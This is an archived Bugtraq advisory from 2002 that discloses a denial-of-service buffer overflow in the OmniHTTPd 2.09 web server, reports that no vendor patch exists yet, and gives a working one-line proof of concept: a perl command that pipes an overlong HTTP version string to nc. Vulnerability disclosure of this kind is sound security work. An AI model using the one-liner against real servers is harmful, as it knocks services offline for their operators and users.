[26025] in bugtraq
BufferOverflow in OmniHTTPd 2.09
daemon@ATHENA.MIT.EDU (Martin J. Muench)
Mon Jul 1 18:20:05 2002
Date: Mon, 1 Jul 2002 20:27:18 +0200 (CEST)
From: "Martin J. Muench" <mjm@codito.de>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>
Message-ID: <20020701202220.W456-100000@gomorrha.mjmnet>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi there.
The OmniHTTPd v2.09 of Omnicron (www.omnicron.ca) contains
a problem with handling long HTTP versions which causes a denial of
service.
Found this problem while developing a new plugin for BED (Bruteforce
Exploit Detector,www.kryptocrew.de/snakebyte/bed.html).
[ Problem
When sending a malformed request with a HTTP version containing 4096 or
more characters, the HTTPd crashes.
Example:
perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 127.0.0.1 80
This attack also works with every other request types like 'GET', 'POST',... .
[ Patches
Nothing published yet, contacted vendor 2 weeks ago.
Keep looking at vendor site at www.omnicron.ca.
Martin J. Muench
- www.codito.de
